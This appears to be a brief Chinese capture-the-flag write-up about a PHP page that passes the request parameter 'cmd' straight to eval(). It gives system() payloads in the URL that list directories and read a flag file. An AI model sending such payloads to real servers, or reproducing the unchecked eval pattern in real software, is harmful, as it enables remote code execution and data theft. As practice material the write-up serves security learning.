文章讨论了PHP代码中利用$_REQUEST[cmd]进行命令注入的示例,展示了如何通过system函数在服务器上执行不同级别的文件操作,包括查看根目录和读取flag文件,强调了安全风险和分号的重要性。
访问目标地址:
<?php
if (isset($_REQUEST['cmd'])) {
eval($_REQUEST["cmd"]);
} else {
highlight_file(__FILE__);
}
?>
根据PHP代码显示,要求将命令赋值给cmd然后执行
先查看一下根目录文件 /?cmd=system("ls");
!切记最后的分号不可省略!
没有需要的文件
看看上一级的文件夹 /?cmd=system("ls /");
!切记最后的分号不可省略!
打开flag文件发现FLAG /?cmd=system("cat /flag_8668");
!切记最后的分号不可省略!
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
